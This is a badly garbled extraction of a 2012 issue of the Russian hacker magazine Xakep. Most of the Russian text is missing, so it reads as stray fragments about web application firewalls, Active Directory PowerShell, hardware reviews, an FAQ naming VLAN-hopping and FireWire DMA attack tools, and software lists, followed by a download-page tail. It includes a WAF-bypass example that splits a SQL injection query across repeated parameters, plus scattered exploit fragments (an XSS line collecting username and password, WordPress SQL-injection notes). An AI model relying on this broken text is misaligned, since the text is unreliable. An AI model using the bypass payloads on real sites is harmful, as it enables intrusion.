-.
,
- .
12 /167/ 2012
7-
IMPERVA SECURESPHERE
WEB APPLICATION FIREWALL
Imperva (imperva.com) WAF:
( SecureSphere WAF)
SaaS- (Imperva Cloud WAF).
, SQL Injection, XSS, CSRF, ,
, .
PCI DSS 6.6 (.
). , Cloud WAF ,
, .
,
DNS-. :
100 / ( ), 2 /
.
, , , (Advanced Web
Policies), .
IPS Snort
, ADC (Application Defense
Center), Imperva,
Bugtraq, CVE .
(Web Dynamic
Profiling) Imperva WAF
- ( )
, .
WDP . ThreatRadar Fraud Prevention Services . ThreatRadar Reputation
Services - ,
, Tor, .
, ( Correlated Attack Validation).

,
( ). .
SecureSphere WAF
: in-line (transparent bridge, reverse proxy) off-line (
). Transparent Inspection, IMPVHA (
1 ),
VRRP STP/RSTP
.
SecureSphere
WAF
PCI DSS?
(Payment Card Industry Data Security Standard, PCI DSS)
,

.
2.0,
. 6.6
WAF (goo.gl/mf1OD).
12 /167/ 2012
Imperva Cloud WAF SaaS
SecureSphere MX Management Server.

. ,
,
.

e-mail .
BARRACUDA WEB APPLICATION FIREWALL

Barracuda Networks Inc. (barracudanetworks.com)
- ,
. Barracuda Web Application
Firewall -
,
, SQL
Injection, XSS, CSRF, ,
, .
Barracuda ,
, 0-day.
whitelist- , .
XML Firewall ,
XML, (WSDL poisoning,
Recursive Passing, Highly nested elements ).
. ,
WAF
W
AF

,
,
,

127
F16
18.9:032
F16
18.9:032
SYN/ACK
Barracuda Web Application Firewall
Barracuda WAF

(Social Security numbers,
). . .
IAM (Identity and Access Management),
(SSO, Single Sign-On),
. LDAP/
RADIUS-, Active Directory.
.
SSL, , L4/L7 HA-, .
-, .

.
Barracuda WAF
(VMware ESXi/
Player/Server, VirtualBox, Citrix XenServer).
, . VM 512 50 . Barracuda WAF
Linux Apache, MySQL, ClamAV .
, .
, - ( 8000).
. XML
XML IPS, WSDL, XML. -:
,
.
DLP . , : (Inline Transparent),
(Transparent Proxy), (Reverse
Proxy), - (Offline Protection).
, FortiWeb (Vulnerability Scanner).
FortiWeb
FortiWeb/FortiOS
,
.
FortiASIC,
(, , security). , SSL XML-
,
. , , ,
(content-based routing),
.
VMware ESXi. ,
,
,
. Fortinet
.
FORTIWEB WEB APPLICATION SECURITY

WAF- Fortinet (fortinet.com)
- XML-,
.
, . PCI DSS 6.6,
, OWASP. ICSA Web Application
Firewall. :
XSS-, SQL Injection, , ,
ookie Poisoning, DOS . ,
HTTP RFC, , ,
. ,
128
AQTRONIX WEBKNIGHT
AQTRONIX WebKnight (aqtronix.com) ISAPI (Internet
Server API) IIS, .
ModSecurity. -
( )
. , WebDAV, Flash, Cold Fusion, Outlook Web/Mobile Access,
SharePoint .
-. , .
, , ,
12 /167/ 2012
F16
18.9:032
7-
WAF
WAF
, , .
, , , HTTP .
WAF ,
, .
HTTP Parameter Pollution (goo.gl/ydwh0).
, . ,
WAF:
DWAF
DWAF
http://www.example.com/search.aspx?q=select
name,password from users
, :
http://www.example.com/search.aspx?q=select
name&q=password from users

/* */, , SQL-,
SQL-.
WAF, WAF. , ,
.
FortiWeb Web Application Security
DOS-, XSS-, SQL injection, , .

.
( ). , WebKnight
HTTP- -, ,
. URL,
.
RFC.
WebKnight
Windows, .
.
GUI. - .
( ).
GUARDIAN@JUMPERZ.NET
Guardian@JUMPERZ.NET (guardian.jumperz.net) WAF
c (GNU GPL),
. Java , .
HTTP/HTTPS-,

. , .
. , .
, ,
. , .
12 /167/ 2012
,
. ,
IP.
( , ).
-.
CITRIX NETSCALER APPLICATION FIREWALL

Citrix, -
,
NetScaler Application Firewall (NAF, goo.
gl/zTZon).
(NetScaler VPX) XenServer,
Hyper-V VMware. Citrix
NetScaler MPX,
. ,
10 / , . NAF
.
, SSL.
NAF ,
.
Positive Security
Model,
. - ,

. CSS, SQL Injection,
,
XML: ,
129
F16
SYN/ACK
18.9:032
F16
F16
18.9:032
18.9:032
Guardian@JUMPERZ.NET
AQTRONIX WebKnight
. . , , L4L7
,
. ICSA. -.
WAF, WAF, ,
dWAF ,
, VM, .
dWAF Riverbed Stingray Application
Firewall (goo.gl/1wRZ5), : Decider
Modules ( , ),
Enforcer Plugins ( , -,
Decider Modules) , .

, , .
, .
, SSO, , URL-encryption. z
STINGRAY APPLICATION FIREWALL

dWAF (Distributed WAF).
-
,
, -.
- WAF , , VM . WAF . Cloud
INFO
WAF MODSECURITY IRONBEE

WAF, 2003 ,
ASLv2.
ModSecurity (modsecurity.org) ,

. ,
.
Core Rules (CRS),
, Trustwave
SpiderLabs (www.trustwave.com/spiderlabs). CRS
OWASP (owasp.org)
-,
HTTP-,
,
, .
Rules Subscription Service.
ClamAV.
,
, , .
ModSecurity
- .
-
Apache,
-, -.
ModSecurity,
-.
, IIS nginx.
,
.
,
,
.
IronBee (ironbee.com),
,
RSA -. :
, ModSecurity,
,
( Apache),
.
libhtp,
HTTP ( libhtp
BSD).
.
F16
130
F16
18.9:032
18.9:032
WASC
(Web Application
Security Consortium,
webappsec.org)
,

,
,

WWW
WAF
Web Application
Security Consortium:
webappsec.org/
projects/wafec.
12 /167/ 2012
166
!
: ?
-, .
300 . -,
. ,
. -, 20
ABBYY Lingvo X5 .
!
6 1110 .
12 1999 .
:
,
ABBYY Tutor,
, ,
PDF-, flash-,
.
20 ,
29
10 , ABBYY Lingvo X5
. .
.
http://shop.glc.ru.
http://shop.glc.ru
8 (800) 200-3-999 ()
subscribe@glc.ru
SYN/ACK
SYN/ACK
(grinder@synack.ru)
WINDOWS SERVER 2012:

ACTIVE DIRECTORY
, Active Directory ,

, , , ,
, .
: , . , .

AD 12 , ,
,
, . AD DS, , , PowerShell. ,
Active Directory (ADAC), ,
, PowerShell. ADAC
(
0132
132
), , .

PS-, ,
, ,
. Active Directory PowerShell
,
, . PS ,
,
, , GUI.
MMC cmd.exe ,
Windows (, ).
AD DS Manager Server, (
PS). ,
dcpromo adprep
,
. , dcpromo PS ADDSDeployment, ,
(Promote this server to a domain controller).
. ,

Schema Master.
adprep Win2k8R2 ( /domainprep
/forestprep). . . ,
(
), ( ),
. , DNS
.
,
(
). ,
12 /167/ 2012
; , .
Win2k8

Fine-Grained Password Policy,
. , ,
Fine Grained Password Policy Tool, Specops Password Policy
Basic, Password Policy Manager .
ADAC, :
System Password Settings Container,
,
, .
Managed Service Accounts (MSA),
Win2k8R2, ( ), Group
Managed Service Accounts (gMSA),
.
Group Key Distribution
Service (GKDS), Win2012. gMSA 30 .
Active Directory
Based Activation (ADBA) ,
(,
), GVLK.

Key Management Service (KMS) , ,
. ADBA
Volume Activation Management Toolkit
(VAMT, goo.gl/3EmVB),
Windows Assessment and Deployment Kit (ADK).
, ADAM , Group Policy,
.
(Dynamic Access
Control) ,
, ,
, . -
DAC ,
, .
. , , (claims), Kerberos.
(Access Denied Remediation).
Win2k8R2,
, (
, Offline Domain Join).
(
VM), . ,
DirectAccess.
, Offline Domain Join
.
, ,
. ,
, RID (Relative Identifier), (SID) , , . RID
(10%), .
RID, , ( 1
2 , 2^30 2^31).

Windows 2012 ,
VM:
, V2V. ,
USN rollback (Update Sequence Number,
), USN , ,
, , . , ,
, . Win2012
VM-Generation ID,
,
VM. 128- , AD.
AD
VM-Generation ID AD , Windows Server 2012.
, .

. ,
PS,
.
Win2k8R2, AD , ,
. ,
.

12 /167/ 2012
0133
133
SYN/ACK
SYN/ACK
, Win2k8R2 ( , Get-ADForest
ForestMode).
Win2012 AD RB ,
ADAC, ,
Enable-ADOptionalFeature:
PS> Enable-ADOptionalFeature Identity
'CN=Recycle Bin Feature,CN=Optional
Features,CN=Directory Service,CN=Windows NT,
CN=Services,CN=Configuration,DC=ad,DC=example,
DC=org' Scope ForestOrConfigurationSet
Target 'example.org'
(claims)
ACTIVE DIRECTORY
AD
, . .
,
, . , MS .
NTDSUTIL Win2k8, VSS,
, ,
(,
managedBy, memberOf ),
, .
Win2k8R2 AD (Active Directory Recycle Bin,
AD RB), , Win2k8R2. , Windows, ,
.
AD RB
.
AD RB 180 , Recycle Bin Lifetime,
. Get-ADObject Restore-ADObject:
PS> Get-ADObject -Filter {displayName -eq "user"}
-IncludeDeletedObjects | Restore-ADObject

. , OU, , OU. Win2012
AD RB,
, . , ADAC AD RB PowerShell,
, .
WARNING
AD :
tombstone
Deleted Objects,
Tombstone Lifetime,

Garbage Collector.
Windows Tombstone Lifetime 180 .
0134
134
Active Directory Recycle Bin

,

. Deleted Objects, ,
.
(
),
(Restore To).
, AD RB , (
), ,
. , .
, AD RB ,
.
AD POWERSHELL
PowerShell Windows, , AD. , AD DS,
:
PS> Add-WindowsFeature AD-Domain-Services
-IncludeManagementTools
, -ComputerName <computer_name> -Restart.
AD
:
Add-Computer -DomainName mydomain.local
:
New-ADUser -SamAccountName User1 -AccountPassword
(read-host "Set user password" -assecurestring)
-name "User1" -enabled $true -PasswordNeverExpires
$true -ChangePasswordAtLogon $false
:
Add-ADPrincipalGroupMembership -Identity
"CN=User1,CN=Users,DC=mydomain,DC=local"
-MemberOf "CN=Enterprise Admins,CN=Users,
DC=mydomain,DC=local","CN=Domain Admins,
CN=Users,DC=mydomain,DC=local"
12 /167/ 2012
Active Directory . ,
AD , PS, , :
. Filter,
AD PowerShell,
.
:
PS> Import-Module ActiveDirectory
, .
: Install-ADDSDomainController, Install-ADDSDomain
Install-ADDSForest. ,
, :
PS> Install-ADDSDomainController "example.org"
Test-ADDSDomainControllerInstallation:
-WhatIf, ,
.
:
PS> Install-ADDSForest DomainName example.org
-CreateDNSDelegation -DomainMode Win8
-ForestMode Win8
:
PS> Get-ADDomainController -Filter *
| ft Hostname,Site
PS> Get-ADReplicationSite -Filter *
, .
New-ADUser.
, (Users),
:
PS> New-ADUser -name User1 -path
"SN=Sales,DC=example,DC=org" -passThru
( goo.gl/qbtzb
Get-Help New-AdUser full),
. ,
CSV- (
Import-CSV).

Get-ADUser. , :
PS> Enable-ADAccount User1
AD
(New-ADComputer), OU (NewADOrganizationalUnit), (New-ADGroup) .
New-ADUser. ,

Get-AD*, Set-AD*.
, . , , , :
PS> Get-ADUser -Identity User1 -Properties MemberOf
WWW

,
Cloneable Domain Controllers.
Active Directory Users and
Computers, Active Directory
Administrative Center PowerShell.
PowerShell
12 /167/ 2012
Active
Directory-Based
Activation:
goo.gl/kvpw5;
VAMT:
goo.gl/3EmVB;

NewADUser: goo.gl/qbtzb.
0135
135
FERRUM
3460
.

TRENDNET TEW-655BR3G
: 1 WAN/LAN (RJ-45)
10/100 /
: Wi-Fi,
IEEE 802.11b/g/n
: 2,4
: WEP, WPA/WPAPSK, WPA2/WPA2-PSK (TKIP,
AES), WPS
: NAT, DynDNS,
Static Routing, DHCP, Virtual Server,
Port Triggering, QoS
: Static IP,
Dynamic IP, PPTP, L2TP
: USB-,
NAT
UP: 56 /
DOWN: 65 /
FDX: 70 /
Wi-Fi, 1/6
UP: 60/56 /
DOWN: 67/60 /
FDX: 70/62 /
: Intel Celeron Dual-Core

G530
: H67MS-E23
: 2 2 ,
Kingston, DDR3
: 400 , FSP
: Microsoft
Windows Server 2008 R2 Standard
x64
: Toshiba SATELLITE
L635-12Q
: D-Link DWA-160
136
. ,
Facebook, , ,
. ,
.
, ? , ,
. ,
TRENDnet TEW-655BR3G.
,
. , TRENDnet
TEW-655BR3G
. , Ethernet
.
. , ,
USB.
USB,
, WPS. . ,
.

, .
, .
, .
,
. ,
( )
. TRENDnet TEW-655BR3G
,
,
.
.
. ,
, .
,
,
.

, ,
. ,
,
, .
.
.
,
,
. .
.
Wi-Fi ( ),
NAT.
Ixia. ,
, .
, TRENDnet . ,
TEW-655BR3G /
,
. z
12 /167/ 2012
GIGABYTE
GA-Z77X-UP7
FOR OVERCLOCKERS.
BY OVERCLOCKERS
11 500
.
GIGABYTE GA-Z77X-UP7 .
Hicookie
OC- GA-X58A-OC.
! ,

.
: LGA1155
: Z77 Express
: 4 DIMM, DDR3-1066-2400
: 5 PCI Express
x16, 2 PCI Express x1
: 4 SATA II,
6 SATA 3.0, 1 mSATA
: 1 Atheros GbE LAN, 10/100/1000
/; 1 Intel GbE LAN, 10/100/1000
/; IEEE 802.11a/b/g/n, Bluetooth
V4.0
: 7.1CH, HDA Realtek
ALC898
: 6 USB
3.0, 1 D-Sub, 1 DVI, 1 HDMI,
1 DisplayPort, 1 S/PDIF, 2 RJ-45,
1 PS/2, 6 3,5- jack
-: E-ATX

: Intel Core i5-2500K, 3300
: GIGABYTE GAZ77X-UP7
: Kingston KHX26C11T2K28X @2133 , 2 4 /
: AMD Radeon HD 7870
: Western Digital
WD10EZEX, 1
: ENERMAX EPM750AWT,
750
: Windows 7 ,
64-
Super PI 1.5XS, 1m: 11,310/7,564

wPrime 1.55, 32m: 9,345/5,996
WinRAR: 3752/4482 /
CINEBENCH R11.5: 4,81/7,1 pts
12 /167/ 2012
, GIGABYTE GA-Z77X-UP7
, . , , ! .
,
PCI Express x16.
.
SLI- CrossFireX-.
8 + 8 + 8 + 8. PCI-E-
.
CPU ( PLX-), , .
PCI Express x1. PCI-E-
IEEE 802.11a/b/g/n Bluetooth V4.0.
:
SATA-. , SATA 3.0 600 /
SATA II. mSATA, SSD-.
,
GIGABYTE GA-Z77X-UP7,
. , 32 (!) .
VTT-,
Intel. ? : 8-
CPU.
500 . ,
32 ,
.
. GIGABYTE GA-Z77X-UP7 -
IR3550 PowIRstages
International Rectifier.
Ultra Durable 5.
.
. ,
SATA-, POST, BIOS
Selector. , DIMM,
,
( 0,1 1 ),
/
BIOS,
.
,
BIOS. , .

Intel Core i5-2500K 5000 !
, hwbot.org
(clck.ru/3roGN). ,
Team.Au Ivy
Bridge i7-3770K 7010,04 . !
, , , ,
. GIGABYTE GA-Z77X-UP7

. , E-ATX
. z
137
FERRUM
!
LOGITECH G103 GAMING KEYBOARD
890
.
Logitech G103 Gaming Keyboard : ,

Windows . , . , .
G-. . , G-, , WASD,
, .
, , ( 2 ). , ,
. . ,
.
LOGITECH G100 GAMING MOUSE

Logitech G100 Gaming Mouse : ( , , ) , , ,
.
: 1000, 1750 2500 ,
, .
.
, 3 ,
250 . .
Logitech G100 Gaming Mouse -,
,
. , , ,
.
138
:
: USB,
:
1000/1750/2500 dpi
: 2,4
. : 23 g
. : 160
( )

(s): 0,14
:
3
: 250
: 4 +
: 80
:
650
.
: USB
:
10 (6 G-Keys, Caps Lock, Num Lock,
Scroll Lock, Joystick switch)
: 2
: 476 193 29
: 648
:
,
6 (G1
G6),

5 ,

Logitech
,

.
Logitech G100 Gaming
Mouse Logitech G103 Gaming Keyboard.
, , .
,
,
. , ! z
12 /167/ 2012
FAQ
(cherboff@gmail.com)
FAQ

FAQ@REAL.XAKEP.RU
,
VLAN

?

A VLAN
ID, . , : Frogger
(commonexploits.com/?p=444)
. ,
, ,

: tshark, arp-scan .

BackTrack.
Frogger
VLAN,

arp-scan
LAN.
,
VLAN,
.
,
,

. , , ?
, A , /,
,
(, SMS)

( ).
hmac ,
, ,
, .

,
OATH (Open AuTHentication).
HOTP (HMAC-based One
Time Password) .
, .

.
TOPT (Time-Based One
Time Password) . ,
, 30 ,
.
OCRA (OATH
Challenge-Response Algorithm)
,
, .

, .

.
?
, A . (Android,
iOS, BlackBerry)
OTP- Google Authenticator,
HOTP
TOPT. ,
Google,
(code.google.com/p/google-authenticator).

Gmail ,
, Dropbox.
PAM-,
.
DuoSecurity (www.
duosecurity.com). API

,
(
SMS).
-
,
?
() -?

FTP
. , ,
,

.
?

.
140

(, Git),
, ,
BitBucket (bitbucket.org).

.
.
CAPISTRANO (CAPISTRANORB.COM)

-. DSL-,
,
.
.
12 /167/ 2012

IEEE 1394 (FireWire).

(DMA). ,
,

, ,
.
, ,

(suspend),
,
,
.
Inception (www.breaknenter.
org/projects/inception), , , .

, ,
.

.
.
Windows 8 SP0, Windows 7 SP0-1, Vista
SP0 SP2, Windows XP SP2-3, Mac OS X Snow
Leopard, Lion Mountain Lion, Ubuntu
. , DMA , Apple, Thunderbolt,

.
TRUECRYPT:
TRUECRYPT
.
. ,
?
, . ,
,
.
,
TrueCrypt ( , ). TCHunt (16s.us/TCHunt/
faq), 100%- ,
.
, .
, ,
, ,
Windows, Linux, Mac OS X. , TCHunt
( TrueCrypt ): TrueCrypt Boot
Loader 512 .
Windows 8 Enterprise
.

,
.
UAC
,

. Windows 8
CHEF (WWW.OPSCODE.COM/CHEF)
, , ,
. (, Apache,
MySQL Hadoop)
coobook,
.
12 /167/ 2012
FABRIC (FABFILE.ORG)

.
Python-
,
,
.
Fabric.
DEPLOY BUTTON
(DEPLOYBUTTON.COM)

. :
,
, (
Chef Capistrano).
.
141
FAQ
: UAC
-
. ?
Administrative Tools
A Local Security Policy, Local
Policies Security Options,
User Account Controls Admin
Approval Mode, .
.

Windows 8?

A . , , .
Pokki (www.pokki.com),

, .

.
, ,
.

Pokki App Store,
(,
, Gmail).
,
bash
.
, . bash-?
BASH Debugger
A (bashdb.sourceforge.net).
bash-,

gdb.
,
,

.
, ,
bash. ,
,
zsh zshdb (https://github.com/
rocky/zshdb).
, , ,

iOS Android,
PhoneGap Titanium Mobile Development
Platform.

App Store Google Play.

,
?

A -
,
,
. ,
142
Pokki Windows 8
,

, . ,
,

.
, ,
- App Annie (www.
appannie.com) Distimo (www.distimo.com).
,

. ,
,
, ,
, .

-,

(, jQuery)?
Twitter
A
Bower (https://github.com/twitter/bower).

JS- CSS-, . ,
jQuery, :
bower install jquery
JS- ./components/jquery.
Bower Node.js (nodejs.org) npm
(npmjs.org):
npm install bower -g
( -
) bower list.
,

. ?
,
A .
:
IntenseDebate (www.intensedebate.com).
,

, .

.
Disqus (disqus.com).
,
(
) (
HTML-, Dropbox).
.
Livefyre (www.livefyre.com).

: (, ),
.
.
,
(
Facebook ),
.
.NET ?
,
,
dotPeek (jetbrains.com/decompiler) JetBrains
( ReSharper, Visual
Studio, .NET-). , . z
12 /167/ 2012
>>Multimedia
CianoDock 0.3.5.1
Coffee 1.0.3
Disk Savvy 4.5.26
Drives Monitor 9.9
Famulus 1.00.5b
FenrirFS 2.46
FileMind 0.6
FiRE 1.0
FreeCommander 2009.02b
Network Monitor II 16.1
Proto 0.6.9.7
>>Misc
CianoDock 0.3.5.1
Coffee 1.0.3
Disk Savvy 4.5.26
Drives Monitor 9.9
Famulus 1.00.5b
FenrirFS 2.46
FileMind 0.6
FiRE 1.0
FreeCommander 2009.02b
Network Monitor II 16.1
Proto 0.6.9.7
Rainmeter 2.3.3
SideSlide 3.5.10
SyncBreeze 4.6
TodoPlus 1.840
Top Process Monitor 5.0
>>Development
Binary Viewer 3.12
CodeLobster PHP Edition 4.3.3
Database .NET 7.4
DBeaver 1.6.4
Eclipse PDT 3.0.2
FlashDevelop 4.0.4
Qxmledit 0.8.3.1
RadASM 2.2.1.6
RJ TextEd 8.42
SciTE 3.02
Spyder 2.1.11
SymPy 0.7.2
Thrust 1.6.0
WebPagetest 2.8
WvStreams 4.6.1
XmlPad 3.0.2.1
>>WINDOWS
>>DailySoft
7-Zip 9.20
DAEMON Tools Lite 4.45.4
Far Manager v2.0 build 1807 x86
Firefox 16.0.2
foobar2000 1.1.16
Google Chrome 22
K-Lite Mega Codec Pack 9.4.0
Miranda IM 0.10.8
Notepad++ 6.2
Opera 12.02
PuTTY 0.62
Skype 6.0
Sysinternals Suite
Total Commander 8.01
Unlocker 1.9.1
uTorrent 3.2
XnView 1.99.5
>UNIX
>>Desktop
Bombonodvd 1.2.1
Calibre 0.9.3
Cherrytree 0.28
Deadbeef 0.5.5
Devede 3.23.0
Ffdiaporama 1.4
>>System
3DP Chip 12.10
Baku 4.3
Battery Optimizer 3.0.5.18
BootRacer 4.0
DrivePurge 1.1
Ketarin 1.6.0.434
muCommander 0.9.0
Open Freely
Samsung SSD Magician 3.2
Simple Performance Boost 1.1.3
Soluto 1.3
SQLBackupAndFTP 8.1.5
WinGuard Pro 8.0.1.0
WinGuggle 2.4
Xleaner 4.20
YUMI 0.0.7.8
>>Security
AD-permissions
antiparser 2.0
Cain&Abel 4.9.43
Canape 1.1
Grinder
Hash Extender
Intercepter-NG 0.9.5
McAfee FileInsight 2.1
ngrep 1.45
Nikto2 2.1.5
packETH 1.6
Socat 1.7.2.1
SQLol 0.4.1
The SSL Conservatory
VSD 2.0
WinDump 3.9.5
>>Net
Anti Netcut 3.0
ASProxyWing 0.9.0
Bitvise SSH Client 4.51
Chromium 25
Connectify 3.7.0
Freegate Professional 7.36
Gbridge 2.0
Mac Makeup 1.95d
Pale Moon 15.2.1
SmartSniff 1.95
Stunnel 4.54
TeamSpeak3 3.0.9.2
TeamViewer 7.0
Tinc 1.0.19
Twindocs
Waterfox 16.0.1
Rainmeter 2.3.3
SideSlide 3.5.10
SyncBreeze 4.6
TodoPlus 1.840
Top Process Monitor 5.0
>>Security
antiparser 2.0
Ccrypt 1.10
Eurephia 1.1.0
Hash Extender
Inception
Jsch 0.1.49
Linotp 2.4.4
mitmproxy 0.8
netsniff-ng 0.5.7
>>Net
Clawsmail 3.8.1
Davmail 4.1.0
Emesene 2.12.9
Firefox 16.0.1
Gfeedline 1.7.1
Graphic-pppoe-client 0.6
Leech raf 0.5.85
Lftp 4.4.0
Lightread 1.2.2
Mdc 1.0.4.3
Midori 0.4.7
Movgrab 1.1.12
Rejik 3.2.10
Sflphone 1.2.0
Skype 4.0.0.8
Steadyflow 0.2.0
Transmission 2.73
Turses 0.2.8
>>Games
Conquests 1.2.1
OpenMW 0.18
Stuntrally 1.7
>>Devel
Bombonodvd 1.2.1
Calibre 0.9.3
Cherrytree 0.28
Deadbeef 0.5.5
Devede 3.23.0
Ffdiaporama 1.4
Freemat 4.1
Glx-dock 3.1
Mirage 0.9.5.2
Mylene 20120910
Mythtv 0.26.0
Nemo 0.2.4
Photini
Shotwell 0.13.1
Transmageddon 0.25
Vlc 2.0.4
Webcamoid 3.2.0
Yakuake 2.9.9
Freemat 4.1
Glx-dock 3.1
Mirage 0.9.5.2
Mylene 20120910
Mythtv 0.26.0
Nemo 0.2.4
Photini
Shotwell 0.13.1
Transmageddon 0.25
Vlc 2.0.4
Webcamoid 3.2.0
Yakuake 2.9.9
>MAC
ALOD
AppKiller 0.9
Audio Switcher 1.5.1
BootChamp 1.4.1
ControlPlane 1.3.9
FixIt II 2.0
Functional 1.0
Growly Notes 1.2.11
Growly Write 1.0.2
MacTerm 4.0
NetSpot 2.0.265
Pixa 0.9.8
Rubilyn 0.0.1
SeaMonkey for PPC 2.13.1
Shortcat 0.3.6
Syrinx 2.6
Todoist 1.3
>>X-distr
Zorin OS 6.1
FreeNAS 8.3.0
>>System
Epm 1.0.3
Finit 1.7
Gparted 0.14.0
Linux 3.6.3
Mesa 9.0
Nvidia 304.60
Oz 0.9.0
Parallel 20121022
Pf-kernel 3.6.5
Rex 0.33.1
Ubuntu-builder 2.3.0
Virtualbox 4.2.2
Wine 1.5.15
Xcms
Xf86-video-intel 2.20.10
>>Server
Apache 2.4.3
BIND 9.9.2
CUPS 1.6.1
DHCP 4.2.4
FlockDB 1.8.5
JBossAS 7.1.2
Lucene 3.6.1
OpenLDAP 2.4.33
OpenSSH 6.1
OpenVPN 2.2.2
Postfix 2.9.4
PostgreSQL 9.2.1
Samba 3.6.9
Sendmail 8.14.5
Squid 3.2.3
Tomcat 7.0.32
Nikto2 2.1.5
Revelation 0.4.14
SiRA 0.1
SQLol 0.4.1
Strongswan 5.0.1
Stunnel 4.54
Suricata 1.3.2
The SSL Conservatory
Waf-fle 0.6.0rc1
Webcert 1.7.5
12 (167) 2012
UNITS / WWW2
WWW2
TUNNELBEAR
tunnelbear.com
, IP-
. -
, , Hulu, Netflix
Spotify, , ,
. TunnelBear , -,
IP . Windows, Mac OS X, Android iOS ,

. 500 .
PI.PE
pi.pe

, - ,
. . 500 Picasa?
,
. Pi.pe : .
(Dropbox, Box.net, SugarSync, Google Drive, Skydrive), (Flickr, Picasa) (Facebook, Instagram).
READY TO GET MOBILE?

howtogomo.com
Google
. ?
? ? ?
, ,
.
,
, responsive.is.
PRIVACYFIX
privacyfix.com
144
Privacyfix Google Chrome Mozilla

Firefox, ,
Google Facebook . ,
- , , Privacyfix ,
, , .

Twitter LinkedIn. , , .
12 /167/ 2012

Хакер 2012 12 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2012 12 PDF

Загружено:

Авторское право:

Доступные форматы

6 ANDROID

Dr. Klouniz (alexander@real.xakep.ru)

MeGoo, Tizen, webOS Firefox OS

THE PIRATE BAY

KYOCERA Document Solutions Russia Phone: +7 (495) 741 0004 www.kyoceradocumentsolutions.ru

UPEK Protector Suite

THREE MUSKETEERS PS3

XSS IE, 0-:

HTML5 API bit.ly/QPBzjs <

#pwnium #pinkiepie SVG useafter-free IPC

oogle Samsung Chromebook, , ,

500 Google Android , .

Apple MacBook Pro 13- Retina.

.NET, Ruby, Python ,

TP-Link Nano TL-WR702N

NETGEAR Push2TV 3000

iFixit Pro Tech Toolkit

InCase Range Messenger Bag

Nike+ Sportwatch GPS

Matias Quiet Pro

Livescribe Sky With Smartpen

Screen Capturer Recorder

FFmpeg => avconv

, SWF, GIF, UVF. ,

: 1024 768 px 1280 1024 px (720p).

. Linux Display ().

VLC media player

, Mac OS: GCC X11.

$ port info bash-completion

MacPorts Apple 2002 .

$ sudo port install bash-completion

$ port list outdated

$ port search completion

$ fink describe bash-completion

fink install imagemagick

$ fink list completion

$ fink install bash-completion

$ echo 'source /sw/etc/bash_completion'

$ brew search completion

$ brew install bash-completion

Allowed file extensions .

, Android, iOS, Windows Phone, Symbian. ,

Nokia N9 MeeGo 1.2

webOS Windows Phone,

ADB (Android Debug Bridge), Android

SSH, ADB OVER WI-FI

$ adb connect 192.168.0.102:5555

GreenDog , Digital Security (twitter.com/antyurin)

$IFS Internal Field Separator, , . (

alert("username=" + ex_username + "&password=" +

1. SFN C:\ Win7

, SMB relay NTLM relay.

for password in passwords:

Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2

Invision Power Board 3.1.2 3.3.1.

WordPress. (Janek Vind

. "', maxdownloads= '"

, POST 'prefix' SQL "INSERT INTO"

WordPress FoxyPress Plugin 0.4.2.5.

Com_sink, COM .NET Windows.

WordPress database error:

MessageBox PHP 5.3.4 Win Com Module Com_sink

function ProgressChange($progress, $progressmax) {

ptr = (char ) malloc((size4+sizeof(buf)4)2);

int func2(char buf, char ptr) {